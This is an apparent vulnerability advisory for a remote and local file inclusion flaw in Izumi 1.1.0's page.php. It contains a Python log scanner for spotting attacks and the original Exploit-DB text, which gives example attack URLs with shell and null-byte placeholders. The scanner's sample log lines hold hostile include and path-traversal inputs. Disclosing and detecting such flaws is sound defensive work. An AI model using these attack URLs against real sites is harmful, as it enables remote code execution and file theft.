vendor: Izumi
by: cr4wl3r
CVSS: 8.8 (HIGH)
Remote File Inclusion (RFI) and Local File Inclusion (LFI)
CWE: 98
Product Name: Izumi
Affected Version From: 1.1.0
Affected Version To: 1.1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:izumi:izumi
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Izumi <= 1.1.0 (RFI/LFI) Multiple Include Vulnerability

Izumi version 1.1.0 and below is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI). The flaw is in page.php, which builds the path passed to require_once from the dir_install and dir_src variables, so an attacker who controls them can make the script include a file from a remote or local source. Exploitation requires only a specially crafted HTTP request that supplies a malicious file path in the dir_install or dir_src parameter.

Mitigation:

Upgrade to the latest version of Izumi, which is not vulnerable to this attack.
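
Until the upgrade is in place, web server access logs can be checked for requests that set the two parameters named above. The following is an added example, not part of the original advisory or the Izumi project: it scans combined-format log lines for requests to src/page.php carrying dir_install or dir_src and labels each value. The log lines are constructed samples, and the script assumes legitimate requests never set these parameters.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Names from the advisory; assumption: legitimate requests never set them.
INCLUDE_PARAMS = {"dir_install", "dir_src"}
SCRIPT_SUFFIX = "/src/page.php"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')  # request line in a log entry
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.I)     # http:, ftp:, ...


def classify(value):
    """Return the reasons a decoded parameter value looks like an include attempt."""
    value = unquote(value)  # second decode catches double-encoded input (%2500)
    reasons = []
    if SCHEME_RE.match(value):
        reasons.append("remote-scheme")
    if "\x00" in value:
        reasons.append("null-byte")
    if "../" in value or "..\\" in value:
        reasons.append("traversal")
    return reasons or ["param-from-request"]


def scan(log_lines):
    """Return (line_number, parameter, reasons) for requests that set an include parameter."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(SCRIPT_SUFFIX):
            continue
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name in INCLUDE_PARAMS:
                findings.append((number, name, classify(value)))
    return findings

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.11 - - [01/Jan/2020:10:00:05 +0000] "GET /izumi/src/page.php?dir_install=http://example.invalid/x.txt HTTP/1.1" 200 90',
    '192.0.2.11 - - [01/Jan/2020:10:00:09 +0000] "GET /izumi/src/page.php?dir_src=../../tmp/constructed%00 HTTP/1.1" 200 90',
    '192.0.2.12 - - [01/Jan/2020:10:00:12 +0000] "GET /izumi/src/page.php?dir_src=..%252f..%252ftmp%252fconstructed%2500 HTTP/1.1" 200 90',
    '192.0.2.13 - - [01/Jan/2020:10:00:20 +0000] "GET /izumi/index.php?page=home HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, name, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {name} -> {', '.join(reasons)}")
```

A finding labelled only param-from-request carries no inclusion marker but still merits review, since the parameter was supplied by the client at all.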

Exploit-DB raw data:

##################################################################
[+] Izumi <= 1.1.0 (RFI/LFI) Multiple Include Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://sourceforge.net/projects/izumi/files/
##################################################################

[+] Code :

##################################################################
[page.php]

require_once($dir_install . $dir_src . "common.php");
##################################################################

[+] Example :

##################################################################
[x] RFI :

  [Izumi_path]/src/page.php?dir_install=[Shell]

[x] LFI :

  [Izumi_path]/src/page.php?dir_src=[LFI%00]


[+] GreetZ : all the naughty street kids of Gorontalo


[+] Note : Brb, laughing first. Hahahahaha
##################################################################